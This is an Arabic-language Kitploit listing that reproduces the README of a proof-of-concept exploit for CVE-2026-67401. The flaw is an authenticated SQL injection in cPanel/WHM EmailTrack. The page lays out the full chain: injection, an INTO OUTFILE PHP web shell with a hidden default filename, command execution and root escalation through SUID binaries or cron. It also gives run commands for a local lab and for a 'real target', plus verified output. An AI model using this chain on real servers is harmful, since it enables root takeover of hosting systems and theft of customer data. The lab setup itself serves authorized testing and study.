Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-67401 — إثبات مفهوم لـ CVE-2026-67401، وهو حقن SQL في EmailTrack الخاص بـ cPanel/WHM يتيح الكتابة التعسفية للملفات وتنفيذ الأوامر عن بُعد بصلاحيات الجذر (root RCE)، مع مجسّات كشف حقن SQL ومختبر معرّض للثغرة قائم بذاته. | Kitploit
أدوات/GitHubGitHub/imbas007/cve-2026-67401
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubimbas007/cve-2026-67401

CVE-2026-67401

إثبات مفهوم لـ CVE-2026-67401، وهو حقن SQL في EmailTrack الخاص بـ cPanel/WHM يتيح الكتابة التعسفية للملفات وتنفيذ الأوامر عن بُعد بصلاحيات الجذر (root RCE)، مع مجسّات كشف حقن SQL ومختبر معرّض للثغرة قائم بذاته.

منذ 3س 58دلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-67401 — حقن SQL في EmailTrack في cPanel/WHM ← تنفيذ أوامر عن بُعد بصلاحيات root

CVE Severity Platform Python

إثبات مفهوم لـ CVE-2026-67401، وهي ثغرة حقن SQL حرجة في وظيفة EmailTrack في cPanel & WHM تتيح لمستخدم مُصادَق عليه يمتلك صلاحيات متعلقة بالبريد كتابة ملفات عشوائية وتنفيذ تعليمات برمجية بصلاحيات root.

اكتشفها: Ali Mustafa أُعلن عنها: 8 سبتمبر 2026 المكوّن: EmailTrack (تسجيل/تتبع تسليم البريد)


الإصدارات المتأثرة

الإصدارات الأقدم من الإصدارات المُصلَّحة عرضة للثغرة.

سلسلة إصدارات cPanelالإصدار المُصلَّح
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

تحقق من إصدارك باستخدام:

root@kitploit:~
cat /usr/local/cpanel/version

سلسلة الاستغلال

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. المصادقة على cPanel بحساب يمتلك صلاحيات البريد.
  2. الحقن عبر معامل account في EmailTrack.
  3. كتابة قشرة ويب PHP باستخدام SELECT ... INTO OUTFILE في public_html/.
  4. تنفيذ الأوامر عبر القشرة.
  5. رفع الصلاحيات عبر ثنائيات SUID في cPanel، أو cron، أو قائمة المهام.

محتويات المستودع

الملفالوصف
poc_sqli.pyكشف حقن SQL: القائم على القيم المنطقية، والقائم على الوقت، وعدّ أعمدة UNION
poc_full_chain.pyسلسلة الاستغلال الكاملة: SQLi ← قشرة ويب عبر INTO OUTFILE ← تنفيذ أوامر عن بُعد ← إرشادات رفع الصلاحيات إلى root
lab/vuln_server.pyمحاكاة محلية لخادم EmailTrack الخلفي المصاب (آمنة ومكتفية ذاتيًا)
README.mdهذا المستند

تتيح لك المختبر المرفق تشغيل والتحقق من السلسلة الكاملة دون الحاجة إلى خادم cPanel حقيقي.


المتطلبات

  • Python 3.8+
  • لا حزم خارجية — كل شيء يستخدم المكتبة القياسية.

الاستخدام

تُنفَّذ جميع الأوامر من جذر المستودع.

1. تشغيل المختبر المحلي

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • بيانات الاعتماد: alice / s3cr1t
  • يحاكي: تسجيل الدخول عبر UAPI، واستعلام EmailTrack المصاب، وSLEEP()، وINTO OUTFILE، وتنفيذ قشرة ويب PHP.
  • المعامل 1: المنفذ (الافتراضي 18123)
  • المعامل 2: جذر المستندات (الافتراضي lab/htdocs)

اترك هذا قيد التشغيل في طرفية واحدة واستخدم طرفية ثانية لإثباتات المفهوم.

2. كشف حقن SQL

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
المعاملالوصف
-H, --hostمضيف cPanel، مثل https://cp.example.com:2083
-u, --usernameحساب cPanel الذي يمتلك صلاحيات البريد
-p, --passwordكلمة مرور الحساب
--paramالمعامل القابل للحقن (الافتراضي: account)
--modedetect (الافتراضي)، أو boolean، أو timing، أو union، أو all
--sleepمدة SLEEP() لمسبار التوقيت (الافتراضي: 3.0)
--dump-versionمحاولة استخراج إصدار نظام إدارة قواعد البيانات عبر UNION
--insecureتخطي التحقق من شهادة TLS

تشغيل مسبار محدد:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. سلسلة الاستغلال الكاملة

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
المعامل / متغير البيئةالوصف
host (موضعي)مضيف cPanel، أو عيّن متغير البيئة CPANEL_HOST
CPANEL_USERحساب cPanel الذي يمتلك صلاحيات البريد
CPANEL_PASSكلمة مرور الحساب
--shell-baseعنوان URL الأساسي الذي يخدم public_html (حيث يتم الوصول إلى قشرة الويب)
--insecureتخطي التحقق من شهادة TLS
--no-escalateالتوقف بعد تنفيذ الأوامر عن بُعد؛ تخطي إرشادات رفع الصلاحيات إلى root
SHELL_NAME (متغير بيئة)اسم ملف قشرة الويب (الافتراضي: .mail.cache.php)

المراحل المُنفَّذة تلقائيًا:

  1. المصادقة على cPanel
  2. تأكيد حقن SQL (القائم على القيم المنطقية + القائم على الوقت)
  3. تحديد عدد أعمدة الاستعلام عبر UNION
  4. كتابة قشرة ويب PHP باستخدام SELECT ... INTO OUTFILE
  5. تنفيذ الأوامر عبر القشرة (id، whoami، تعداد SUID، …)
  6. طباعة إرشادات رفع الصلاحيات إلى root (SUID whmapi1، cron، قائمة المهام)

4. ضد هدف حقيقي

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

ملاحظة: القيمة الافتراضية لـ --shell-base تُزيل منفذ cPanel الخاص فقط (2082/2083) من المضيف. إذا كان جذر المستندات يُخدَم على منفذ مختلف، فعيّنه صراحةً.


النتائج المُتحقَّق منها

المخرجات الناتجة ضد المختبر المرفق:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

المراجع

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

الترخيص

صدر لأغراض تعليمية وأغراض البحث الأمني المصرّح به. راجع إخلاء المسؤولية قبل الاستخدام.

تنزيل الأداة